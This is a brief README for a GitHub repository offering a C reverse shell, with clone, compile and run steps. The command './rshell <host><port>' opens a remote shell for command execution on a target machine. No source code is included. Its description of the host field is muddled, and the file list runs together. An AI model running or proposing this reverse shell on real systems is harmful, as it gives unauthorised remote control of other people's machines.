Welcome to the Remote C Shell repository! This C-based reverse shell enables remote command execution on a target machine.
To use the remote shell, run the following command:
./rshell <host><port>LICENSE: License information for the project.Makefile: Makefile to compile the project.README.md: This readme file.rshell.c: The source code for the reverse shell.
Clone the repository:
git clone https://github.com/fenrirsec/RemoteCShell.git cd RemoteCShellCompile the source code:
make
Run the reverse shell:
./rshell <host><port>
Replace <host> with the target IP address and <port> with the desired port number.
Stay safe and use responsibly! 🛡️